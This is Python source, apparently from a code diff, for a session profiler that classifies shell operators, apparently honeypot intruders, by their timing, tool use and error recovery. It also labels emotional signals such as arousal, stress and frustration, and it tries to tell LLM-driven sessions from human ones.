def error_resilience_retry_tactic(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.error_resilience.retry_tactic``.
For each command with ``Command.errored=True``, classify the
operator's response by the *next* command:
* **rerun** — same first_token_hash as the errored command. The
operator re-invoked the same tool (often after fixing args
mid-edit, but we can't see args).
* **switch** — different first_token_hash. Pivoted to a different
tool.
* **abort** — no next command. Session ended after the error.
The session's reported tactic is the **modal** response across all
errored commands (with ties broken in registry order: rerun >
modify > switch > abort). Skip emission entirely when no commands
errored — the registry has no ``unknown`` here, and silence is the
most honest answer.
The ``modify`` value (edit-and-retry) requires within-command
diffing of arg tokens, which crosses the PII boundary the engine
holds (only ``first_token_hash`` is retained per command). v0.1
therefore never emits ``modify``; v0.2 will once the PII trade-off
is revisited against a real attacker corpus.
"""
errored = [(i, c) for i, c in enumerate(ctx.commands) if c.errored]
if not errored:
return
counts = {"rerun": 0, "switch": 0, "abort": 0}
for i, cmd in errored:
if i + 1 >= len(ctx.commands):
counts["abort"] += 1
elif ctx.commands[i + 1].first_token_hash == cmd.first_token_hash:
counts["rerun"] += 1
else:
counts["switch"] += 1
# Registry-order tiebreak (rerun > modify > switch > abort).
# `modify` deferred — never increments here.
order = ("rerun", "switch", "abort")
value = max(order, key=lambda k: counts[k])
if len(errored) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.65
yield make_observation(
ctx,
primitive="cognitive.error_resilience.retry_tactic",
value=value,
confidence=confidence,
)
def tool_vocabulary(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.tool_vocabulary`` ∈ {narrow, moderate, broad}.
Absolute count of distinct first_token_hashes. Skip emission when
no commands exist; below the sample-size floor we still emit, but
at confidence 0.40 — a session with few commands but five distinct
tools is genuinely a moderate-vocabulary signal.
"""
if not ctx.commands:
return
distinct = len({c.first_token_hash for c in ctx.commands})
if distinct <= TOOL_VOCAB_NARROW_MAX:
value = "narrow"
elif distinct >= TOOL_VOCAB_BROAD_MIN:
value = "broad"
else:
value = "moderate"
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.70
yield make_observation(
ctx,
primitive="cognitive.tool_vocabulary",
value=value,
confidence=confidence,
)
def planning_depth(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.planning_depth`` ∈ {deep, shallow, reactive}.
Read off the distribution of inter-command IATs:
* **deep** — many think-pauses (> ``IKI_THINK_MAX_S``). The
operator stops to think between commands.
* **reactive** — most pauses are sub-instant
(≤ ``INTER_CMD_INSTANT_MAX``). Knee-jerk pacing — automated
runner, prepared playbook, or an LLM with no internal latency.
* **shallow** — neither: mostly typing-speed pauses, no extended
contemplation.
Skip emission when no inter-command IATs exist (one or zero
commands); the registry has no ``unknown`` for this primitive.
"""
iats = ctx.inter_cmd_iats
if not iats:
return
n = len(iats)
deep_count = sum(1 for x in iats if x > IKI_THINK_MAX_S)
reactive_count = sum(1 for x in iats if x <= INTER_CMD_INSTANT_MAX)
deep_frac = deep_count / n
reactive_frac = reactive_count / n
if deep_frac >= PLANNING_DEEP_MIN:
value = "deep"
elif reactive_frac >= PLANNING_REACTIVE_MIN:
value = "reactive"
else:
value = "shallow"
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.65
yield make_observation(
ctx,
primitive="cognitive.planning_depth",
value=value,
confidence=confidence,
)
def exploration_style(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.exploration_style`` ∈ {methodical, chaotic, targeted}.
Two-axis classification over the first_token_hash sequence:
* **methodical** — low repetition, low backtracks. Operator marches
forward through new tools.
* **targeted** — high repetition (R ≥ EXPLORATION_TARGETED_REP_MIN).
Same tool re-invoked repeatedly; the operator is drilling.
* **chaotic** — high backtrack rate (J ≥ EXPLORATION_CHAOTIC_BACKTRACK_MIN).
Jumps among previously-used tools without a clear thread.
The registry doesn't permit ``unknown``; below the
MIN_COMMANDS_FOR_FULL_CONFIDENCE floor we emit at confidence 0.40
rather than skip — the engine has *some* signal, just less of it.
Skip emission only when there are no commands at all.
"""
n = len(ctx.commands)
if n == 0:
return
hashes = [c.first_token_hash for c in ctx.commands]
unique = len(set(hashes))
repetition_rate = 0.0 if n == 0 else 1.0 - (unique / n)
# Backtrack: at position i, hashes[i] previously seen at index < i-1
# and not equal to hashes[i-1]. (Repeating the immediate predecessor
# is "drilling", picked up by repetition_rate; backtrack is the
# non-local jump signal.)
seen_before: set[str] = set()
backtracks = 0
transitions = 0
if hashes:
seen_before.add(hashes[0])
for i in range(1, n):
transitions += 1
if hashes[i] != hashes[i - 1] and hashes[i] in seen_before:
backtracks += 1
seen_before.add(hashes[i])
backtrack_rate = (backtracks / transitions) if transitions else 0.0
if backtrack_rate >= EXPLORATION_CHAOTIC_BACKTRACK_MIN:
value = "chaotic"
elif repetition_rate >= EXPLORATION_TARGETED_REP_MIN:
value = "targeted"
else:
value = "methodical"
if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.60
yield make_observation(
ctx,
primitive="cognitive.exploration_style",
value=value,
confidence=confidence,
)
def cognitive_load(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.cognitive_load`` ∈ {low, medium, high}.
Composite of three [0, 1]-clipped sub-signals, mean-aggregated:
* **chunking** — median CV of intra-command IATs / reference CV.
Fragmented mid-command typing → high contribution.
* **errors** — fraction of commands whose post-execution output
matched a canonical error fingerprint (``Command.errored`` from
Step D.0). Failures pile load.
* **pace variability** — CV of inter-command IATs / reference CV.
A spread of think-pause durations → unsettled cadence → load.
Components missing data contribute 0.0 (no penalty for an absent
signal), and the composite normalises by *available* component
count so a session with zero inter-command pauses isn't punished
for the silence. Skip emission entirely when no commands at all
exist — there's no honest answer.
v0.1 thresholds; D.8 re-tunes once the rest of Phase D is stable.
"""
if not ctx.commands:
return
# Component A: chunking variance — median within-command CV
per_cmd_cvs: list[float] = []
for cmd_iats in ctx.intra_command_iats:
cv = _cv(cmd_iats)
if cv is not None:
per_cmd_cvs.append(cv)
if per_cmd_cvs:
chunking_load: float | None = _clip01(
statistics.median(per_cmd_cvs) / COGNITIVE_LOAD_CHUNKING_REF_CV
)
else:
chunking_load = None
# Component B: error rate
error_load: float = sum(1 for c in ctx.commands if c.errored) / len(ctx.commands)
error_load = _clip01(error_load)
# Component C: pace variability — CV of inter-command IATs
pace_cv = _cv(ctx.inter_cmd_iats)
if pace_cv is not None:
pace_load: float | None = _clip01(pace_cv / COGNITIVE_LOAD_PACE_REF_CV)
else:
pace_load = None
components = [c for c in (chunking_load, error_load, pace_load) if c is not None]
if not components:
return
load = sum(components) / len(components)
if load < COGNITIVE_LOAD_LOW_MAX:
value = "low"
elif load < COGNITIVE_LOAD_MEDIUM_MAX:
value = "medium"
else:
value = "high"
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
# Composite over three soft sub-signals — held below the
# cap of single-source primitives. D.8 re-tunes.
confidence = 0.60
yield make_observation(
ctx,
primitive="cognitive.cognitive_load",
value=value,
confidence=confidence,
)
def inter_command_consistency(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.inter_command_consistency``.
CV (stdev / mean) of inter-command IATs.
* ``metronomic`` (CV < 0.40) → LLM-pure. Empirical anchor:
LLM-simulated session CV ≈ 0.24 in this corpus.
* ``variable`` (0.40 ≤ CV < 1.50) → human. Empirical anchor:
human session CV ≈ 0.94.
* ``bimodal`` (CV ≥ 1.50) → LLM-assisted human, heuristic. v0.1
uses CV-only; true bimodal detection (Hartigan dip / two-peak)
is filed for v0.2 per the registry's ``notes:`` field.
"""
iats = ctx.inter_cmd_iats
if len(iats) < 2:
return
mean = statistics.fmean(iats)
if mean <= 0.0:
return
cv = statistics.stdev(iats) / mean
if cv < PAUSE_CV_METRONOMIC_MAX:
value = "metronomic"
elif cv >= PAUSE_CV_BIMODAL_MIN:
value = "bimodal"
else:
value = "variable"
confidence = (
0.40 if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE else 0.75
)
yield make_observation(
ctx,
primitive="cognitive.inter_command_consistency",
value=value,
confidence=confidence,
)

View File

@@ -0,0 +1,223 @@
"""``emotional_valence.*`` feature functions (Phase G, soft block).
All four primitives in this module ride a hard 0.5 confidence cap
(:data:`EMOTIONAL_VALENCE_CONFIDENCE_CAP`). Cap is enforced inside
the feature functions, *not* via :func:`make_observation` — sample-size
honesty may still pull confidence below 0.5.
Step G.5: ``emotional_valence.valence``.
Step G.6: ``emotional_valence.arousal`` (lands later).
Step G.7: ``emotional_valence.stress_response`` (lands later).
Step G.8: ``emotional_valence.frustration_venting`` (lands later).
"""
from __future__ import annotations
import statistics
from typing import Iterator
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features._emit import make_observation
from decnet.profiler.behave_shell._thresholds import (
AROUSAL_BANG_RUN_MIN,
AROUSAL_CALM_IAT_S,
AROUSAL_CAPS_RUN_MIN,
AROUSAL_FAST_IAT_S,
AROUSAL_MIN_IATS,
EMOTIONAL_VALENCE_CONFIDENCE_CAP,
FRUST_VENT_FULL_CONFIDENCE_MIN,
FRUST_VENT_MIN_TYPED_CHARS,
STRESS_DISTRESS_RATIO_MIN,
STRESS_EUSTRESS_RATIO_MIN,
STRESS_MIN_ERRORED_WITH_IATS,
VALENCE_FULL_CONFIDENCE_MIN,
VALENCE_MIN_HITS,
VALENCE_MIN_TYPED_CHARS,
)
def _cap_soft(c: float) -> float:
"""Clamp confidence to the soft-primitive ceiling."""
return min(c, EMOTIONAL_VALENCE_CONFIDENCE_CAP)
def valence(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``emotional_valence.valence`` ∈ {positive, neutral, negative}.
Pure ratio over the lexical counters built in G.0:
* ``positive`` — ``positive_lex_hits > negative_lex_hits +
obscenity_hits`` AND ``positive_lex_hits ≥ VALENCE_MIN_HITS`` (2).
* ``negative`` — ``negative_lex_hits + obscenity_hits >
positive_lex_hits`` AND that sum ≥ ``VALENCE_MIN_HITS``.
* ``neutral`` — fall-through.
Skip emission below ``VALENCE_MIN_TYPED_CHARS`` (80) typed letters.
Confidence hard-capped at 0.50 (registry convention); 0.30 below
``VALENCE_FULL_CONFIDENCE_MIN`` (200).
"""
if ctx.typed_letter_count < VALENCE_MIN_TYPED_CHARS:
return
pos = ctx.positive_lex_hits
neg_total = ctx.negative_lex_hits + ctx.obscenity_hits
if pos > neg_total and pos >= VALENCE_MIN_HITS:
value = "positive"
elif neg_total > pos and neg_total >= VALENCE_MIN_HITS:
value = "negative"
else:
value = "neutral"
raw = 0.50 if ctx.typed_letter_count >= VALENCE_FULL_CONFIDENCE_MIN else 0.30
yield make_observation(
ctx,
primitive="emotional_valence.valence",
value=value,
confidence=_cap_soft(raw),
)
def arousal(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``emotional_valence.arousal`` ∈ {low_calm, medium_engaged,
high_agitated}.
Three signals (any of which fires ``high_agitated``):
* ``ctx.caps_run_max ≥ AROUSAL_CAPS_RUN_MIN`` (5) — capslock rant.
* ``ctx.bang_run_max ≥ AROUSAL_BANG_RUN_MIN`` (3) — repeated bangs.
* The fastest typing burst's median IAT < ``AROUSAL_FAST_IAT_S``
(0.06) over a burst of ≥ ``AROUSAL_MIN_IATS`` (30) IATs.
``low_calm`` — slowest qualifying burst's median IAT >
``AROUSAL_CALM_IAT_S`` (0.30).
``medium_engaged`` — fall-through.
Skip emission when no qualifying typing bursts. Confidence hard-
capped at 0.50; 0.30 below ``AROUSAL_MIN_IATS`` total typed IATs.
"""
qualifying = [b for b in ctx.typing_bursts if len(b) >= 3]
if not qualifying:
return
fastest_med = min(statistics.median(b) for b in qualifying)
slowest_med = max(statistics.median(b) for b in qualifying)
total_iats = sum(len(b) for b in qualifying)
if (
ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN
or ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN
or (
total_iats >= AROUSAL_MIN_IATS
and fastest_med < AROUSAL_FAST_IAT_S
)
):
value = "high_agitated"
elif total_iats >= AROUSAL_MIN_IATS and slowest_med > AROUSAL_CALM_IAT_S:
value = "low_calm"
else:
value = "medium_engaged"
raw = 0.50 if total_iats >= AROUSAL_MIN_IATS else 0.30
yield make_observation(
ctx,
primitive="emotional_valence.arousal",
value=value,
confidence=_cap_soft(raw),
)
def stress_response(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``emotional_valence.stress_response`` ∈ {none,
eustress_positive, distress_negative}.
Compare typing speed *after* an errored command vs the session
baseline:
* For each errored command at index ``i``, gather
``ctx.intra_command_iats[i+1]`` — the response command's intra-
command IATs.
* Baseline: median of all intra-command IATs from commands NOT
immediately following an errored command.
Verdict by ratio of post-error / baseline:
* ratio ≥ ``STRESS_EUSTRESS_RATIO_MIN`` (1.20) → ``eustress_positive``
(slowed down — recovered, deliberate).
* ratio ≤ ``1 / STRESS_DISTRESS_RATIO_MIN`` → ``distress_negative``
(sped up — anxious, mashing keys).
* otherwise → ``none``.
Skip emission when no commands. Confidence hard-capped at 0.50;
0.30 below ``STRESS_MIN_ERRORED_WITH_IATS`` (2) errored commands
with non-empty post-error IAT data.
"""
if not ctx.commands:
return
post_error_iats: list[float] = []
baseline_iats: list[float] = []
n = len(ctx.commands)
qualifying_errored = 0
for i, cmd in enumerate(ctx.commands):
is_post_error = i > 0 and ctx.commands[i - 1].errored
iats = list(ctx.intra_command_iats[i]) if i < len(ctx.intra_command_iats) else []
if is_post_error:
if iats:
qualifying_errored += 1
post_error_iats.extend(iats)
else:
baseline_iats.extend(iats)
# mypy: silence unused-var on n / cmd (kept for clarity)
_ = (n, cmd)
if not post_error_iats or not baseline_iats:
value = "none"
else:
med_post = statistics.median(post_error_iats)
med_base = statistics.median(baseline_iats)
if med_base <= 0.0:
value = "none"
else:
ratio = med_post / med_base
if ratio >= STRESS_EUSTRESS_RATIO_MIN:
value = "eustress_positive"
elif ratio <= 1.0 / STRESS_DISTRESS_RATIO_MIN:
value = "distress_negative"
else:
value = "none"
raw = 0.50 if qualifying_errored >= STRESS_MIN_ERRORED_WITH_IATS else 0.30
yield make_observation(
ctx,
primitive="emotional_valence.stress_response",
value=value,
confidence=_cap_soft(raw),
)
def frustration_venting(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``emotional_valence.frustration_venting`` ∈ {none, detected}.
Pure read of ``ctx.obscenity_hits`` (G.0 lexical counter):
* ``detected`` — ``obscenity_hits ≥ 1``.
* ``none`` — zero hits.
Skip emission below ``FRUST_VENT_MIN_TYPED_CHARS`` (30) typed
letters — too thin to call cleanly absent. Confidence hard-capped
at 0.50; 0.40 when ``detected``; 0.50 only when ``none`` AND
typed_letter_count ≥ ``FRUST_VENT_FULL_CONFIDENCE_MIN`` (200);
0.30 otherwise.
"""
if ctx.typed_letter_count < FRUST_VENT_MIN_TYPED_CHARS:
return
if ctx.obscenity_hits >= 1:
value = "detected"
raw = 0.40
else:
value = "none"
if ctx.typed_letter_count >= FRUST_VENT_FULL_CONFIDENCE_MIN:
raw = 0.50
else:
raw = 0.30
yield make_observation(
ctx,
primitive="emotional_valence.frustration_venting",
value=value,
confidence=_cap_soft(raw),
)

Some files were not shown because too many files have changed in this diff Show More